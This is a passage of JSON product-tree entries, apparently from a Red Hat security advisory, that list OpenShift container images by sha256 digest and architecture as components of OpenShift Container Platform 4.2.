"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c0001b283485a536f3bc95ad9095564ca637bcfea44ce1139b285339586f1165_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c0001b283485a536f3bc95ad9095564ca637bcfea44ce1139b285339586f1165_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c0001b283485a536f3bc95ad9095564ca637bcfea44ce1139b285339586f1165_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:d24318c9fc02f5d9d2e6bab9ba9d9450b44cd40962349f555f3090ac519b9c15_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:d24318c9fc02f5d9d2e6bab9ba9d9450b44cd40962349f555f3090ac519b9c15_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:d24318c9fc02f5d9d2e6bab9ba9d9450b44cd40962349f555f3090ac519b9c15_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:484dd2472b2c56bbcf927cf1665a785d07057b40f2219f3d4c26a6febb9b6efe_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:484dd2472b2c56bbcf927cf1665a785d07057b40f2219f3d4c26a6febb9b6efe_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:484dd2472b2c56bbcf927cf1665a785d07057b40f2219f3d4c26a6febb9b6efe_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:6ec6749f659c131148713fa74ca30e17622814fab8f891a7cd823d65c6a9d93b_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:6ec6749f659c131148713fa74ca30e17622814fab8f891a7cd823d65c6a9d93b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:6ec6749f659c131148713fa74ca30e17622814fab8f891a7cd823d65c6a9d93b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:934e5f00851d37ed1d324f0aca7fb32c584db8352c5a79b06ba0412469add29b_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:934e5f00851d37ed1d324f0aca7fb32c584db8352c5a79b06ba0412469add29b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:934e5f00851d37ed1d324f0aca7fb32c584db8352c5a79b06ba0412469add29b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:ad4e1756a4e4703806818721c390347d06632762eb0613e34fdd9dff25122d93_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:ad4e1756a4e4703806818721c390347d06632762eb0613e34fdd9dff25122d93_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:ad4e1756a4e4703806818721c390347d06632762eb0613e34fdd9dff25122d93_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:7e573786dc8a3102297cdeb8e8df2d3baf09f84e90d23d3df307d119b8c50f1a_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:7e573786dc8a3102297cdeb8e8df2d3baf09f84e90d23d3df307d119b8c50f1a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:7e573786dc8a3102297cdeb8e8df2d3baf09f84e90d23d3df307d119b8c50f1a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fd5caff02b551caf0a6246b803591de5b01a5ee5e4caf98f0bbc42003bb0ffbe_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fd5caff02b551caf0a6246b803591de5b01a5ee5e4caf98f0bbc42003bb0ffbe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fd5caff02b551caf0a6246b803591de5b01a5ee5e4caf98f0bbc42003bb0ffbe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:47fcac8f8d0002e0f7d66cc90f9f2768b9c9e713089ce281bc4c39532f9d8290_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:47fcac8f8d0002e0f7d66cc90f9f2768b9c9e713089ce281bc4c39532f9d8290_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:47fcac8f8d0002e0f7d66cc90f9f2768b9c9e713089ce281bc4c39532f9d8290_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:579ec95bfbafe095682fcd83739112440e59a65ca8aa09a0362e1c7ae13fa55e_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:579ec95bfbafe095682fcd83739112440e59a65ca8aa09a0362e1c7ae13fa55e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:579ec95bfbafe095682fcd83739112440e59a65ca8aa09a0362e1c7ae13fa55e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5d044d51008f938694e3ff32b0190bef0cfd717dc6373a988fc4b89522869736_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5d044d51008f938694e3ff32b0190bef0cfd717dc6373a988fc4b89522869736_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5d044d51008f938694e3ff32b0190bef0cfd717dc6373a988fc4b89522869736_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f4c29b8743f133e7480aebbc25971f9357badd3befa9f9487503c39a4bf55f66_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f4c29b8743f133e7480aebbc25971f9357badd3befa9f9487503c39a4bf55f66_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f4c29b8743f133e7480aebbc25971f9357badd3befa9f9487503c39a4bf55f66_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:5e53f158e380070656ae5fa0be5aab36f74188ca981aa6c523aead1d926bcfe8_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:5e53f158e380070656ae5fa0be5aab36f74188ca981aa6c523aead1d926bcfe8_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:5e53f158e380070656ae5fa0be5aab36f74188ca981aa6c523aead1d926bcfe8_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:9215463c548662202ddd125670b45d64f847595ffa540d6fe9cbb3482c5eabe0_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:9215463c548662202ddd125670b45d64f847595ffa540d6fe9cbb3482c5eabe0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:9215463c548662202ddd125670b45d64f847595ffa540d6fe9cbb3482c5eabe0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:997da5aecef571f4733b9de7a23882decc79f3b1e121f9524cb58d5f0343a8b2_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:997da5aecef571f4733b9de7a23882decc79f3b1e121f9524cb58d5f0343a8b2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:997da5aecef571f4733b9de7a23882decc79f3b1e121f9524cb58d5f0343a8b2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:0796012228b715b8d0b1f7f8a8716e5fcb8e1eef5b4c91c1b9aeb586764165a1_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:0796012228b715b8d0b1f7f8a8716e5fcb8e1eef5b4c91c1b9aeb586764165a1_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:0796012228b715b8d0b1f7f8a8716e5fcb8e1eef5b4c91c1b9aeb586764165a1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:822b61d5af679d4040c7ae01495dd7f0ebc187a7c3aced2d7c70ed39d09f792d_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:822b61d5af679d4040c7ae01495dd7f0ebc187a7c3aced2d7c70ed39d09f792d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:822b61d5af679d4040c7ae01495dd7f0ebc187a7c3aced2d7c70ed39d09f792d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:a66aa215d0b85dfb8f0809c7920a0616c0f9422c8101336311a0372e1599fac5_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:a66aa215d0b85dfb8f0809c7920a0616c0f9422c8101336311a0372e1599fac5_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:a66aa215d0b85dfb8f0809c7920a0616c0f9422c8101336311a0372e1599fac5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b51b955ab667088df969d867c5c78afa6c0e91799a77947c71f74fe5121e4b82_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b51b955ab667088df969d867c5c78afa6c0e91799a77947c71f74fe5121e4b82_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b51b955ab667088df969d867c5c78afa6c0e91799a77947c71f74fe5121e4b82_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3f75242f1c9a7f21c44291c7920f9de873e3f888c0848ceb868c93fc52cadf59_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3f75242f1c9a7f21c44291c7920f9de873e3f888c0848ceb868c93fc52cadf59_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3f75242f1c9a7f21c44291c7920f9de873e3f888c0848ceb868c93fc52cadf59_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:c691d971d54dfac8a3d2b4560df928887c0c42726ea53276acc6fd82796fe013_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:c691d971d54dfac8a3d2b4560df928887c0c42726ea53276acc6fd82796fe013_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:c691d971d54dfac8a3d2b4560df928887c0c42726ea53276acc6fd82796fe013_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:ce0cc9b08b407cc5c7e2fb4b8b8046aa8d6602ff4f0f1446705ba41ebc343113_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:ce0cc9b08b407cc5c7e2fb4b8b8046aa8d6602ff4f0f1446705ba41ebc343113_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:ce0cc9b08b407cc5c7e2fb4b8b8046aa8d6602ff4f0f1446705ba41ebc343113_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e9c032f902b75cfdbcace74992f172093a13adf9a3e56fa863916acceb687f69_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e9c032f902b75cfdbcace74992f172093a13adf9a3e56fa863916acceb687f69_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e9c032f902b75cfdbcace74992f172093a13adf9a3e56fa863916acceb687f69_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:a00a2c837b45a833c9480610052c2758a89ca13bddea7205fa864cf669b9a537_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:a00a2c837b45a833c9480610052c2758a89ca13bddea7205fa864cf669b9a537_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:a00a2c837b45a833c9480610052c2758a89ca13bddea7205fa864cf669b9a537_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ed059e0a5fc89373a42df693cce41426035f587aa81cf2ac7986d3c3a74bc252_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ed059e0a5fc89373a42df693cce41426035f587aa81cf2ac7986d3c3a74bc252_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ed059e0a5fc89373a42df693cce41426035f587aa81cf2ac7986d3c3a74bc252_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:0c07c89d2e6ed9ee9f484ab11623fb55f6d9d6328bb59ac475b6b26e354f2fa4_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:0c07c89d2e6ed9ee9f484ab11623fb55f6d9d6328bb59ac475b6b26e354f2fa4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:0c07c89d2e6ed9ee9f484ab11623fb55f6d9d6328bb59ac475b6b26e354f2fa4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:b8ab622ccda9a36914c49e39c68bfb6bdb9a268e4564e40cc049f78b6995a40f_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:b8ab622ccda9a36914c49e39c68bfb6bdb9a268e4564e40cc049f78b6995a40f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:b8ab622ccda9a36914c49e39c68bfb6bdb9a268e4564e40cc049f78b6995a40f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:ce1eb507f327c654614af04bf3cdfc16b958e4826f5aabc3c2d9ba94f4f2e55c_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:ce1eb507f327c654614af04bf3cdfc16b958e4826f5aabc3c2d9ba94f4f2e55c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:ce1eb507f327c654614af04bf3cdfc16b958e4826f5aabc3c2d9ba94f4f2e55c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:d4a2a09d63248f7f338ebadbdb03b48299d3c9284cb71ba81c3a6dc58534703c_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:d4a2a09d63248f7f338ebadbdb03b48299d3c9284cb71ba81c3a6dc58534703c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:d4a2a09d63248f7f338ebadbdb03b48299d3c9284cb71ba81c3a6dc58534703c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:8af34f7f4fb73551a98d986d0bb1e59beb3ff58fed5c0abcdf7fa4ff40697926_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:8af34f7f4fb73551a98d986d0bb1e59beb3ff58fed5c0abcdf7fa4ff40697926_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:8af34f7f4fb73551a98d986d0bb1e59beb3ff58fed5c0abcdf7fa4ff40697926_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:bdbd1f9f158d0a48d2cad324c3956c74d1820ae81f5db242a2b8573c271f0f0a_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:bdbd1f9f158d0a48d2cad324c3956c74d1820ae81f5db242a2b8573c271f0f0a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:bdbd1f9f158d0a48d2cad324c3956c74d1820ae81f5db242a2b8573c271f0f0a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f532fe57b2214b4cd215af2d9d34bb77d46eca74ae6dc96e6b6ce3df16f19ed0_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f532fe57b2214b4cd215af2d9d34bb77d46eca74ae6dc96e6b6ce3df16f19ed0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f532fe57b2214b4cd215af2d9d34bb77d46eca74ae6dc96e6b6ce3df16f19ed0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f8de6e3bc707d84b0e44610c14a2cf7811175f49616678f24930e80861eb747d_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f8de6e3bc707d84b0e44610c14a2cf7811175f49616678f24930e80861eb747d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f8de6e3bc707d84b0e44610c14a2cf7811175f49616678f24930e80861eb747d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:691b019fb05a753e814a5aba61569635318334e29f4a8bfee0ff0c0c33028978_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:691b019fb05a753e814a5aba61569635318334e29f4a8bfee0ff0c0c33028978_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:691b019fb05a753e814a5aba61569635318334e29f4a8bfee0ff0c0c33028978_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:8f1848090e84bf6b19b86185443f820c6f935582cdfadea3e197a6be044c51bc_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:8f1848090e84bf6b19b86185443f820c6f935582cdfadea3e197a6be044c51bc_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:8f1848090e84bf6b19b86185443f820c6f935582cdfadea3e197a6be044c51bc_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:3ee1daa00cc3c529cd0c1f6116694e2792f9384633084d0e2ec4d85fac6394f3_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:3ee1daa00cc3c529cd0c1f6116694e2792f9384633084d0e2ec4d85fac6394f3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:3ee1daa00cc3c529cd0c1f6116694e2792f9384633084d0e2ec4d85fac6394f3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:7679a49d3de0c40c142457d4d5ff66e22d5dffaa563fd58227d92f7483239779_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:7679a49d3de0c40c142457d4d5ff66e22d5dffaa563fd58227d92f7483239779_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:7679a49d3de0c40c142457d4d5ff66e22d5dffaa563fd58227d92f7483239779_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:2818f7d8c47b51a811ff46e8d83146b50bdbe7657f89a11a19a3a9e262c40eb4_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:2818f7d8c47b51a811ff46e8d83146b50bdbe7657f89a11a19a3a9e262c40eb4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:2818f7d8c47b51a811ff46e8d83146b50bdbe7657f89a11a19a3a9e262c40eb4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f3906dd6b9a9de755e0f94b1cf9f38855ebc93b8d3bcb66330e86553b9a0a8c2_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f3906dd6b9a9de755e0f94b1cf9f38855ebc93b8d3bcb66330e86553b9a0a8c2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f3906dd6b9a9de755e0f94b1cf9f38855ebc93b8d3bcb66330e86553b9a0a8c2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:570296451ca687e24780c6e744043252477d343f01abbf293369d83f15abd62e_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:570296451ca687e24780c6e744043252477d343f01abbf293369d83f15abd62e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:570296451ca687e24780c6e744043252477d343f01abbf293369d83f15abd62e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:66bf4a0ba4cbc5c74d13c83255452e5738e34fa7ef1b5966706c5f41d58d161e_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:66bf4a0ba4cbc5c74d13c83255452e5738e34fa7ef1b5966706c5f41d58d161e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:66bf4a0ba4cbc5c74d13c83255452e5738e34fa7ef1b5966706c5f41d58d161e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
